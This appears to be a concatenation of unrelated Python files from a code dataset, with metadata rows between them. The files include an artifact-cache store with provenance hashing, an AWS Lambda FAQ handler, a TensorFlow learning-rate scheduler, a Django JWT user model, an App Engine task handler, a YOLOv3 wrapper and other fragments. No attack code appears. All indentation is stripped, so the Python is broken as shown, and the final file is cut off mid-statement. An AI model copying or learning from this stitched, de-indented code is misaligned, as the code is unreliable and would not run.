def __init__(self, root_path_str):
root_path = Path(root_path_str).absolute()
self._artifact_root_path = root_path / "artifacts"
inventory_root_path = root_path / "inventory"
tmp_root_path = root_path / "tmp"
self.inventory = Inventory(
"local disk", "local", LocalFilesystem(inventory_root_path, tmp_root_path)
)
def generate_unique_dir_path(self, query):
n_attempts = 0
while True:
# TODO This path can be anything as long as it's unique, so we
# could make it more human-readable.
path = (
self._artifact_root_path
/ valid_filename_from_query(query)
/ str(uuid4())
)
if not path.exists():
return path
else:
n_attempts += 1
if n_attempts > 3:
raise AssertionError(
oneline(
f"""
Repeatedly failed to randomly generate a novel
directory name; {path} already exists"""
)
)
class GcsCloudStore:
"""
Represents the GCS cloud cache. Provides both an Inventory that manages
artifact (blob) URLs, and a method to generate those URLs (for creating
those blobs).
"""
def __init__(self, url):
self._tool = GcsTool(url)
self.inventory = Inventory(
"GCS", "cloud", GcsFilesystem(self._tool, "/inventory")
)
self._artifact_root_url_prefix = url + "/artifacts"
def generate_unique_url_prefix(self, query):
n_attempts = 0
while True:
# TODO This path can be anything as long as it's unique, so we
# could make it more human-readable.
url_prefix = "/".join(
[
str(self._artifact_root_url_prefix),
valid_filename_from_query(query),
str(uuid4()),
]
)
matching_blobs = self._tool.blobs_matching_url_prefix(url_prefix)
if len(list(matching_blobs)) == 0:
return url_prefix
else:
n_attempts += 1
if n_attempts > 3:
raise AssertionError(
oneline(
f"""
Repeatedly failed to randomly generate a novel
blob name; {self._artifact_root_url_prefix}
already exists"""
)
)
def upload(self, path, url):
# TODO For large individual files, we may still want to use gsutil.
if path.is_dir():
self._tool.gsutil_cp(str(path), url)
else:
assert path.is_file()
self._tool.blob_from_url(url).upload_from_filename(str(path))
def download(self, path, url):
blob = self._tool.blob_from_url(url)
# TODO For large individual files, we may still want to use gsutil.
if not blob.exists():
# `gsutil cp -r gs://A/B X/Y` doesn't work when B contains
# multiple files and Y doesn't exist yet. However, if B == Y, we
# can run `gsutil cp -r gs://A/B X`, which will create Y for us.
assert path.name == blob.name.rsplit("/", 1)[1]
self._tool.gsutil_cp(url, str(path.parent))
else:
blob.download_to_filename(str(path))
class FakeCloudStore(LocalStore):
"""
A mock version of the GcsCloudStore that's actually backed by local files.
Useful for running tests without setting up a GCS connection, which is
slow and requires some configuration.
"""
def __init__(self, root_path_str):
super(FakeCloudStore, self).__init__(root_path_str)
def generate_unique_url_prefix(self, query):
return url_from_path(self.generate_unique_dir_path(query))
def upload(self, path, url):
src_path = path
dst_path = path_from_url(url)
recursively_copy_path(src_path, dst_path)
def download(self, path, url):
src_path = path_from_url(url)
dst_path = path
recursively_copy_path(src_path, dst_path)
class LocalFilesystem:
"""
Implements a generic "FileSystem" interface for reading/writing small files
to local disk.
"""
def __init__(self, inventory_dir, tmp_dir):
self.root_url = url_from_path(inventory_dir)
self.tmp_root_path = tmp_dir
def exists(self, url):
return path_from_url(url).exists()
def search(self, url_prefix):
path_prefix = path_from_url(url_prefix)
if not path_prefix.is_dir():
return []
return [
url_from_path(path_prefix / sub_path)
for sub_path in path_prefix.glob("**/*")
]
def delete(self, url):
path = path_from_url(url)
if not path.exists():
return False
path.unlink()
return True
def write_bytes(self, content_bytes, url):
path = path_from_url(url)
ensure_parent_dir_exists(path)
ensure_dir_exists(self.tmp_root_path)
working_dir = Path(tempfile.mkdtemp(dir=str(self.tmp_root_path)))
try:
working_path = working_dir / "tmp_file"
working_path.write_bytes(content_bytes)
working_path.rename(path)
finally:
shutil.rmtree(str(working_dir))
def read_bytes(self, url):
return path_from_url(url).read_bytes()
class GcsFilesystem:
"""
Implements a generic "FileSystem" interface for reading/writing small files
to GCS.
"""
def __init__(self, gcs_tool, object_prefix_extension):
self._tool = gcs_tool
self.root_url = self._tool.url + object_prefix_extension
def exists(self, url):
# Checking for "existence" on GCS is slightly complicated. If the URL in
# question corresponds to a single file, we should find an object with a
# matching name. If it corresponds to directory of files, we should find one or
# more objects with a matching prefix (the expected name followed by a slash).
return any(
found_url == url or found_url.startswith(url + "/")
for found_url in self.search(url)
)
def search(self, url_prefix):
return [
self._tool.url_from_object_name(blob.name)
for blob in self._tool.blobs_matching_url_prefix(url_prefix)
]
def delete(self, url):
blob = self._tool.blob_from_url(url)
if blob is None:
return False
blob.delete()
return True
def write_bytes(self, content_bytes, url):
self._tool.blob_from_url(url).upload_from_string(content_bytes)
def read_bytes(self, url):
return self._tool.blob_from_url(url).download_as_string()
class InternalCacheStateError(Exception):
"""
Indicates a problem with the integrity of our cached data. Before this is
surfaced to a user, it should be converted to an InvalidCacheStateError.
"""
@classmethod
def from_failure(cls, artifact_type, location, exc):
return cls(f"Unable to read {artifact_type} {location!r} in cache: {exc}")
class InvalidCacheStateError(Exception):
"""
Indicates that the cache state may have been corrupted.
"""
def valid_filename_from_query(query):
"""
Generates a filename from a query.
This just gets the descriptor string from the query and replaces any
spaces with hyphens. (At the time of writing, descriptors can't contain
spaces, but in the future they will be able to.)
"""
return query.dnode.to_descriptor().replace(" ", "-")
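# Illustrative sketch (hypothetical descriptor): a query whose descriptor
# rendered as "raw data" would yield the filename "raw-data".
#
#     valid_filename_from_query(query)  # -> "raw-data"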
CACHE_SCHEMA_VERSION = 8
class YamlRecordParsingError(Exception):
pass
class ArtifactMetadataRecord:
"""
Describes a persisted artifact. Intended to be stored as a YAML file.
"""
@classmethod
def from_content(cls, dnode, artifact_url, provenance, metadata_url, value_hash):
return cls(
body_dict=dict(
descriptor=dnode.to_descriptor(),
artifact_url=relativize_url(artifact_url, metadata_url),
provenance=provenance.to_dict(),
value_hash=value_hash,
)
)
@classmethod
def from_yaml(cls, yaml_str, metadata_url):
try:
body_dict = yaml.load(yaml_str, Loader=YamlLoader)
except yaml.error.YAMLError as e:
raise YamlRecordParsingError(f"Couldn't parse {cls.__name__}") from e
record = cls(body_dict=body_dict)
record.artifact_url = derelativize_url(record.artifact_url, metadata_url)
return record
def __init__(self, body_dict):
try:
self._dict = body_dict
self.descriptor = self._dict["descriptor"]
self.artifact_url = self._dict["artifact_url"]
self.provenance = Provenance.from_dict(self._dict["provenance"])
self.value_hash = self._dict["value_hash"]
except KeyError as e:
raise YamlRecordParsingError(
f"YAML for ArtifactMetadataRecord was missing field: {e}"
)
def to_yaml(self):
return yaml.dump(
self._dict, default_flow_style=False, encoding=None, Dumper=YamlDumper,
)
def __repr__(self):
return f"ArtifactMetadataRecord({self.descriptor!r})"
class Provenance:
"""
    Describes the code and data used to generate a (possibly-yet-to-be-computed)
value. Provides a set of hashes that can be used to determine if two
such values are meaningfully different, without actually examining the
values.
Provenances can "match" at several different levels of precision.
1. Functional match: all input data is the same, and all functions involved
in the computation have matching major versions. This is the lowest level
of matching, but it's a sufficient condition to treat two artifacts as
interchangeable. The only purpose of the higher levels is to allow
recursive searches for possible versioning errors, where the user has
changed a function's bytecode but failed to update its version.
2. Nominal match: as above, plus the function that computes this value has
a matching minor version. If two provenances don't nominally match, then
they have different versions, which means this particular descriptor doesn't
have a versioning error (although its dependencies might or might not).
3. "Samecode" match: as above, plus the function that computes this value
has matching bytecode. If two provenances are a nominal match but not
a samecode match, that suggests the user may have made a versioning error
in this descriptor.
4. Exact match: as above, plus all dependencies exactly match. If two
provenances exactly match, then there is no chance of any versioning error
anywhere in this descriptor's dependency tree.
"""
@classmethod
def from_computation(
cls,
code_fingerprint,
case_key,
dep_provenance_digests_by_task_key,
treat_bytecode_as_functional,
can_functionally_change_per_run,
flow_instance_uuid,
):
dep_task_key_provenance_digest_pairs = sorted(
dep_provenance_digests_by_task_key.items()
)
functional_code_dict = dict(
orig_flow_name=code_fingerprint.orig_flow_name,
code_version_major=code_fingerprint.version.major,
cache_schema_version=CACHE_SCHEMA_VERSION,
)
nonfunctional_code_dict = dict(
code_version_minor=code_fingerprint.version.minor,
)
bytecode_hash = code_fingerprint.bytecode_hash
if treat_bytecode_as_functional:
functional_code_dict["bytecode_hash"] = bytecode_hash
else:
nonfunctional_code_dict["bytecode_hash"] = bytecode_hash
# The function's output changes with each run; to reflect that,
# we add the flow uuid to the hash so that it will be different
# each time.
if can_functionally_change_per_run:
functional_code_dict["flow_instance_uuid"] = flow_instance_uuid
full_code_dict = dict(
functional=functional_code_dict,
nonfunctional=nonfunctional_code_dict,
bytecode_hash=bytecode_hash,
)
functional_deps_list = [
dict(
descriptor=task_key.dnode.to_descriptor(),
hash=provenance_digest.functional_hash,
)
for task_key, provenance_digest in dep_task_key_provenance_digest_pairs
]
exact_deps_list = [
dict(
descriptor=task_key.dnode.to_descriptor(),
hash=provenance_digest.exact_hash,
)
for task_key, provenance_digest in dep_task_key_provenance_digest_pairs
]
exact_deps_hash = hash_simple_obj_to_hex(exact_deps_list)
functional_hash = hash_simple_obj_to_hex(
dict(code=functional_code_dict, deps=functional_deps_list,)
)
exact_hash = hash_simple_obj_to_hex(
dict(code=full_code_dict, deps=exact_deps_list,)
)
return cls(
body_dict=dict(
case_key=dict(case_key),
code=full_code_dict,
functional_deps=functional_deps_list,
functional_hash=functional_hash,
exact_hash=exact_hash,
exact_deps_hash=exact_deps_hash,
)
)
@classmethod
def from_dict(cls, body_dict):
return cls(body_dict=body_dict)
def __init__(self, body_dict=None):
self._dict = body_dict
d = self._dict
self.functional_hash = d["functional_hash"]
self.exact_hash = d["exact_hash"]
self.exact_deps_hash = d["exact_deps_hash"]
self.code_version_major = d["code"]["functional"]["code_version_major"]
self.code_version_minor = d["code"]["nonfunctional"]["code_version_minor"]
self.bytecode_hash = d["code"]["bytecode_hash"]
def to_dict(self):
return self._dict
def __repr__(self):
hash_fn = self.functional_hash[:8]
v_maj = self.code_version_major
v_min = self.code_version_minor
hash_ex = self.exact_hash[:8]
return f"Provenance[{hash_fn}/{v_maj}.{v_min}/{hash_ex}]"
def exactly_matches(self, prov):
return self.exact_hash == prov.exact_hash
def dependencies_exactly_match(self, prov):
return self.exact_deps_hash == prov.exact_deps_hash
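# Illustrative usage sketch (hypothetical body_dict containing the fields read
# in __init__ above): two Provenance objects built from equal dicts are an
# exact match, and therefore also match at every weaker level.
#
#     prov_a = Provenance.from_dict(body_dict)
#     prov_b = Provenance.from_dict(dict(body_dict))
#     assert prov_a.exactly_matches(prov_b)
#     assert prov_a.dependencies_exactly_match(prov_b)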
| 34.656222
| 88
| 0.623415
| 36,679
| 0.947508
| 654
| 0.016894
| 4,781
| 0.123505
| 0
| 0
| 11,846
| 0.306011
|
af84d23224addc1fdc1ef092243757bb1b97c61d
| 925
|
py
|
Python
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | 8
|
2019-12-30T16:37:53.000Z
|
2020-04-09T17:18:14.000Z
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | 95
|
2020-02-03T15:13:19.000Z
|
2020-05-05T01:00:16.000Z
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import boto3
#Last Updated
#5/3/2020
s3 = boto3.client('s3') #S3 object
def lambda_handler(event, context):
#Initializing the variables
bucket = 't2-bucket-storage'
key = 'FAQ.txt'
#CORS headers
response_headers = {}
response_headers["X-Requested-With"] = "*"
response_headers["Access-Control-Allow-Origin"] = "*"
response_headers["Access-Control-Allow-Headers"] = "Content-Type,X-Amz-Date,Authorization,X-Api-Key,x-requested-with'"
response_headers["Access-Control-Allow-Methods"] = "OPTIONS,POST,GET,PUT,DELETE"
#Getting the data from the bucket
data = s3.get_object(Bucket=bucket, Key=key)
    jsonData = data['Body'].read().decode('utf-8') #This will read the faq page for its contents
#Returning the faq content here
return {
'statusCode': 200,
'body': jsonData,
'headers': response_headers,
'isBase64Encoded': False
}
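# Illustrative local invocation sketch (assumes AWS credentials are configured
# and that the bucket/key above exist); the event and context arguments are
# not used by this handler.
#
#     if __name__ == '__main__':
#         print(lambda_handler({}, None))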
| 30.833333
| 122
| 0.665946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 472
| 0.51027
|
af85b8246d06deab8fbd40d2dd688d0cf7df337f
| 1,582
|
py
|
Python
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 125
|
2019-12-05T02:50:56.000Z
|
2022-02-22T08:03:24.000Z
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 4
|
2020-03-18T05:56:22.000Z
|
2020-07-11T11:10:17.000Z
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 26
|
2019-12-12T06:25:47.000Z
|
2022-01-19T22:19:41.000Z
|
import tensorflow as tf
class LearningRateStrategy(object):
def __init__(self, init_lr, strategy_spec):
self._type = strategy_spec.pop('type', 'exponential_decay')
self._decay_steps = strategy_spec.pop('decay_steps', 1000)
self._decay_rate = strategy_spec.pop('decay_rate', 0.9)
self._kwargs = strategy_spec
self._init_lr = init_lr
def __call__(self, global_step):
if self._type == 'exponential_decay':
lr = tf.train.exponential_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate,
**self._kwargs)
elif self._type == 'polynomial_decay':
lr = tf.train.polynomial_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
**self._kwargs)
elif self._type == 'natural_exp_decay':
lr = tf.train.natural_exp_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
                decay_rate=self._decay_rate,
                **self._kwargs)
elif self._type == 'inverse_time_decay':
lr = tf.train.inverse_time_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate,
**self._kwargs)
return lr
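# Illustrative usage sketch (hypothetical hyper-parameter values; relies on the
# TF 1.x-style tf.train decay ops imported above):
#
#     global_step = tf.train.get_or_create_global_step()
#     lr_schedule = LearningRateStrategy(
#         init_lr=1e-3,
#         strategy_spec={'type': 'exponential_decay',
#                        'decay_steps': 1000,
#                        'decay_rate': 0.9})
#     lr = lr_schedule(global_step)  # scalar tensor that decays with the step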
| 38.585366
| 67
| 0.591656
| 1,555
| 0.982933
| 0
| 0
| 0
| 0
| 0
| 0
| 126
| 0.079646
|
af8721001b7e64b7b7d1b084ad899f44e8598884
| 2,841
|
py
|
Python
|
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
from functools import partial
import pytest
from plenum.test import waits
from plenum.test.helper import sendRandomRequests, waitForSufficientRepliesForRequests, checkReqAck
from plenum.test.pool_transactions.helper import buildPoolClientAndWallet
from stp_core.loop.eventually import eventuallyAll
from stp_core.validators.message_length_validator import MessageLenValidator
from plenum.test.pool_transactions.conftest import looper, client1Connected # noqa
from plenum.test.pool_transactions.conftest import clientAndWallet1, client1, wallet1 # noqa
def test_msg_max_length_check_node_to_node(looper,
txnPoolNodeSet,
client1,
wallet1,
client1Connected,
clientAndWallet2):
"""
Two clients send 2*N requests each at the same time.
N < MSG_LEN_LIMIT but 2*N > MSG_LEN_LIMIT so the requests pass the max
length check for client-node requests but do not pass the check
for node-node requests.
"""
N = 10
# it is an empirical value for N random requests
# it has to be adjusted if the world changed (see pydoc)
max_len_limit = 3000
patch_msg_len_validators(max_len_limit, txnPoolNodeSet)
client2, wallet2 = clientAndWallet2
reqs1 = sendRandomRequests(wallet1, client1, N)
reqs2 = sendRandomRequests(wallet2, client2, N)
check_reqacks(client1, looper, reqs1, txnPoolNodeSet)
check_reqacks(client2, looper, reqs2, txnPoolNodeSet)
waitForSufficientRepliesForRequests(looper, client1, requests=reqs1)
waitForSufficientRepliesForRequests(looper, client2, requests=reqs2)
def patch_msg_len_validators(max_len_limit, txnPoolNodeSet):
for node in txnPoolNodeSet:
assert hasattr(node.nodestack, 'msgLenVal')
assert hasattr(node.nodestack, 'msg_len_val')
node.nodestack.msgLenVal = MessageLenValidator(max_len_limit)
node.nodestack.msg_len_val = MessageLenValidator(max_len_limit)
def check_reqacks(client, looper, reqs, txnPoolNodeSet):
reqack_coros = []
for req in reqs:
reqack_coros.extend([partial(checkReqAck, client, node, req.identifier,
req.reqId, None) for node in txnPoolNodeSet])
timeout = waits.expectedReqAckQuorumTime()
looper.run(eventuallyAll(*reqack_coros, totalTimeout=timeout))
@pytest.fixture(scope="module")
def clientAndWallet2(looper, poolTxnClientData, tdirWithClientPoolTxns):
client, wallet = buildPoolClientAndWallet(poolTxnClientData,
tdirWithClientPoolTxns)
looper.add(client)
looper.run(client.ensureConnectedToNodes())
yield client, wallet
client.stop()
| 38.917808
| 99
| 0.697994
| 0
| 0
| 322
| 0.11334
| 354
| 0.124604
| 0
| 0
| 387
| 0.13622
|
af879e6f69f0e9817c68bf41b7101a7b9761611c
| 2,935
|
py
|
Python
|
src/api/models/user.py
|
ThaDeveloper/grind
|
fa90b65d12e6d9b3d658b132874801ecda08c57f
|
[
"MIT"
] | 1
|
2019-11-06T22:26:26.000Z
|
2019-11-06T22:26:26.000Z
|
src/api/models/user.py
|
ThaDeveloper/grind
|
fa90b65d12e6d9b3d658b132874801ecda08c57f
|
[
"MIT"
] | 5
|
2021-03-19T02:49:44.000Z
|
2021-06-10T19:13:00.000Z
|
src/api/models/user.py
|
ThaDeveloper/grind
|
fa90b65d12e6d9b3d658b132874801ecda08c57f
|
[
"MIT"
] | null | null | null |
"""User model module"""
import jwt
from datetime import datetime, timedelta
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin
from django.conf import settings
from django.core.validators import RegexValidator
from .base_model import CommonFields
from api.models.user_manager import UserManager
class User(AbstractBaseUser, PermissionsMixin, CommonFields):
"""User model """
USER_TYPE = [
('professional', 'professional'),
('client', 'client')
]
USERNAME_REGEX = '^[a-zA-Z]{5,}$'
first_name = models.CharField(max_length=30, null=False)
last_name = models.CharField(max_length=30, null=False)
email = models.EmailField(unique=True, null=False)
username = models.CharField(
max_length=30,
validators=[
RegexValidator(
regex=USERNAME_REGEX,
message='Username must be 5 or more alphabetic characters',
code='invalid_username')],
unique=True, null=False)
password = models.CharField(max_length=128, null=False)
active = models.BooleanField(default=True)
admin = models.BooleanField(default=False)
staff = models.BooleanField(default=False)
user_type = models.CharField(max_length=20, choices=USER_TYPE, null=False)
date_joined = models.DateTimeField(auto_now_add=True)
last_login = models.DateTimeField(auto_now=True)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username', ]
class Meta:
"""metadata options."""
ordering = ('pk',)
verbose_name = 'User'
def __str__(self):
"""Return object's string representation."""
return f'{self.first_name} {self.last_name}'
@property
def is_active(self):
"""Check if user is active."""
return self.active
@property
def is_staff(self):
"""Check whether user is a staff."""
return self.staff
@property
def is_superuser(self):
"""Check whether user is a super user."""
return self.admin
@property
def token(self):
"""
Get a user's token by calling `user.token`.
"""
return self._generate_jwt_token()
def _generate_jwt_token(self):
"""
Generates a JSON Web Token for access to auth endpoints
"""
dt = datetime.now() + timedelta(days=1)
token = jwt.encode({
'id': self.pk,
'username': self.username,
'email': self.email,
'exp': int(dt.strftime('%s'))
}, settings.SECRET_KEY, algorithm='HS256')
return token.decode('utf-8')
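    # Illustrative verification sketch (hypothetical `user` instance): the token
    # produced above can be decoded with the same secret and algorithm, e.g.
    #
    #     payload = jwt.decode(user.token, settings.SECRET_KEY, algorithms=['HS256'])
    #     payload['username']  # -> user.username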
def get_full_name(self):
return ('%s %s') % (self.first_name, self.last_name)
def get_short_name(self):
return self.username
def has_perm(self, perm, obj=None):
return self.admin
| 29.35
| 78
| 0.635775
| 2,549
| 0.868484
| 0
| 0
| 465
| 0.158433
| 0
| 0
| 603
| 0.205451
|
af89871525ce046c30aacd0f640b5f99e4205cd0
| 2,254
|
py
|
Python
|
deferred/handler.py
|
potatolondon/djangoappengine-1-4
|
ae4993597f5afcfa0df42f0fa50913f4c85e2b74
|
[
"BSD-3-Clause"
] | null | null | null |
deferred/handler.py
|
potatolondon/djangoappengine-1-4
|
ae4993597f5afcfa0df42f0fa50913f4c85e2b74
|
[
"BSD-3-Clause"
] | null | null | null |
deferred/handler.py
|
potatolondon/djangoappengine-1-4
|
ae4993597f5afcfa0df42f0fa50913f4c85e2b74
|
[
"BSD-3-Clause"
] | null | null | null |
# Initialize Django.
from djangoappengine import main
from django.utils.importlib import import_module
from django.conf import settings
# Load all models.py to ensure signal handling installation or index
# loading of some apps
for app in settings.INSTALLED_APPS:
try:
import_module('%s.models' % (app))
except ImportError:
pass
# The maximum retry count on the original task queue. After that the task is re-enqueued on the broken-tasks queue
MAX_RETRY_COUNT = getattr(settings, 'TASK_RETRY_ON_SOURCE_QUEUE', None)
BROKEN_TASK_QUEUE = getattr(settings, 'BROKEN_TASK_QUEUE', 'broken-tasks')
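# Illustrative settings sketch (hypothetical values) for the retry behaviour
# configured above; the named queue is expected to be declared in queue.yaml:
#
#     TASK_RETRY_ON_SOURCE_QUEUE = 5
#     BROKEN_TASK_QUEUE = 'broken-tasks'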
import logging
from google.appengine.api import taskqueue
from google.appengine.ext.webapp import WSGIApplication
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.deferred import deferred
class LimitedTaskHandler(deferred.TaskHandler):
def post(self):
try:
self.run_from_request()
except deferred.SingularTaskFailure:
logging.debug("Failure executing task, task retry forced")
self.response.set_status(408)
except deferred.PermanentTaskFailure:
logging.exception("Permanent failure attempting to execute task")
except Exception, exception:
logging.exception(exception)
retries = int(self.request.headers['X-AppEngine-TaskExecutioncount'])
already_broken = self.request.headers['X-AppEngine-Queuename'] == BROKEN_TASK_QUEUE
if already_broken or MAX_RETRY_COUNT is None or retries < MAX_RETRY_COUNT:
# Failing normally
self.error(500)
else:
logging.info("Retrying this task on the broken-tasks queue from now on")
                # Reinserting the task onto the broken-tasks queue
task = taskqueue.Task(
payload=self.request.body,
countdown=2.0,
url=deferred._DEFAULT_URL,
headers=deferred._TASKQUEUE_HEADERS
)
task.add(BROKEN_TASK_QUEUE)
application = WSGIApplication([(".*", LimitedTaskHandler)])
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
| 33.641791
| 111
| 0.676575
| 1,265
| 0.561224
| 0
| 0
| 0
| 0
| 0
| 0
| 571
| 0.253327
|
af8999488b4c74fa92580fccfbc64a7e842f0087
| 260
|
py
|
Python
|
stix_shifter/stix_transmission/src/modules/cloudIdentity/cloudIdentity_results_connector.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter/stix_transmission/src/modules/cloudIdentity/cloudIdentity_results_connector.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter/stix_transmission/src/modules/cloudIdentity/cloudIdentity_results_connector.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | 2
|
2019-06-26T19:23:52.000Z
|
2019-07-09T15:33:16.000Z
|
from ..base.base_results_connector import BaseResultsConnector
import json
from .....utils.error_response import ErrorResponder
class CloudIdentityResultsConnector(BaseResultsConnector):
def __init__(self, api_client):
self.api_client = api_client
| 28.888889
| 62
| 0.807692
| 129
| 0.496154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af8a181071e7abdcc867b84eb6bf5ea64085f25a
| 717
|
py
|
Python
|
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
import sys
from churn_calc import ChurnCalculator
def main():
'''
    Creates a churn calculator and runs the statistics and correlation functions.
    The schema name is taken from the first command line argument and the
    dataset (optionally) from the second; all other parameters are taken from
    the schema configuration.
:return: None
'''
schema = 'churnsim2'
if len(sys.argv) >= 2:
schema = sys.argv[1]
dataset = None
if len(sys.argv) >= 3:
dataset = sys.argv[2]
churn_calc = ChurnCalculator(schema,dataset)
churn_calc.dataset_stats(save=True)
churn_calc.dataset_corr(save=True)
churn_calc.dataset_corr(save=True,use_scores=False)
if __name__ == "__main__":
main()
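# Illustrative invocation sketch (hypothetical schema and dataset names):
#
#     python churn_stats.py churnsim2 my_dataset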
| 23.9
| 86
| 0.687587
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 284
| 0.396095
|
af8b4f7cdd96f1e05ccc0b6456d5fe449a767019
| 2,888
|
py
|
Python
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 25
|
2020-11-20T09:01:35.000Z
|
2022-03-29T10:35:38.000Z
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 5
|
2021-02-28T20:49:37.000Z
|
2022-03-04T21:50:27.000Z
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 16
|
2020-12-06T07:26:13.000Z
|
2022-03-01T07:51:55.000Z
|
"""Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
import yolov3.yolov3_postprocessing as postprocessing
import numpy as np
import cv2
import os
class YOLOV3(object):
"""YOLOv3"""
def __init__(self, camera_height, camera_width, yolo_model):
# load YOLO model
self.yolo_v3 = yolo_model
# parameters for preprocessing
self.ih, self.iw = (camera_height, camera_width)
self.h, self.w = (416, 416)
self.scale = min(self.w / self.iw, self.h / self.ih)
self.nw = int(self.iw * self.scale)
self.nh = int(self.ih * self.scale)
# parameters for postprocessing
self.image_shape = [camera_height, camera_width]
self.model_shape = [self.h, self.w]
self.num_classes = 1
self.anchors = self.get_anchors()
def get_anchors(self):
"""return anchors
Returns:
[ndarray]: anchors array
"""
SRC_PATH = os.path.realpath(__file__).rsplit("/", 1)[0]
anchors_path = os.path.join(SRC_PATH, './yolo_anchors.txt')
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def inference(self, img):
"""Run YOLOv3 for face detection
Args:
            img ([ndarray]): input image of shape (camera_height, camera_width, 3)
"""
# preprocessing: resize and paste input image to a new image with size 416*416
img = np.array(img, dtype='float32')
img_resize = cv2.resize(img, (self.nw, self.nh),
interpolation=cv2.INTER_CUBIC)
img_new = np.ones((416, 416, 3), np.float32) * 128
img_new[(self.h - self.nh) // 2: ((self.h - self.nh) // 2 + self.nh),
(self.w - self.nw) // 2: (self.w - self.nw) // 2 + self.nw, :] = img_resize[:, :, :]
img_new = img_new / 255.
# inference
resultList = self.yolo_v3.execute([img_new])
out_list = [resultList[0], resultList[1], resultList[2]]
# convert yolo output to box axis and score
box_axis, box_score = postprocessing.yolo_eval(
out_list, self.anchors, self.num_classes, self.image_shape)
# get the crop image and corresponding width/heigh info for WHENet
nparryList, boxList = postprocessing.get_box_img(img, box_axis)
return nparryList, boxList
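# Illustrative usage sketch (hypothetical camera size and model handle; the
# model object is assumed to expose the .execute() method used in inference):
#
#     detector = YOLOV3(camera_height=720, camera_width=1280, yolo_model=model)
#     face_crops, face_boxes = detector.inference(frame)  # frame: (720, 1280, 3)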
| 39.027027
| 100
| 0.630194
| 2,260
| 0.782548
| 0
| 0
| 0
| 0
| 0
| 0
| 1,044
| 0.361496
|
af8b6e0be67a25ec631893c23bc76d3128fe5bc9
| 901
|
py
|
Python
|
rigid_body_motion/ros/check_install.py
|
phausamann/rigid-body-motion
|
2d4fbb1b949cc0b609a59877d7539af75dad6861
|
[
"MIT"
] | 8
|
2021-05-20T02:24:07.000Z
|
2022-03-05T17:15:11.000Z
|
rigid_body_motion/ros/check_install.py
|
phausamann/rigid-body-motion
|
2d4fbb1b949cc0b609a59877d7539af75dad6861
|
[
"MIT"
] | 10
|
2019-06-13T09:36:15.000Z
|
2022-01-17T16:55:05.000Z
|
rigid_body_motion/ros/check_install.py
|
phausamann/rigid-body-motion
|
2d4fbb1b949cc0b609a59877d7539af75dad6861
|
[
"MIT"
] | 1
|
2021-08-13T10:24:31.000Z
|
2021-08-13T10:24:31.000Z
|
import traceback
if __name__ == "__main__":
try:
import geometry_msgs.msg # noqa
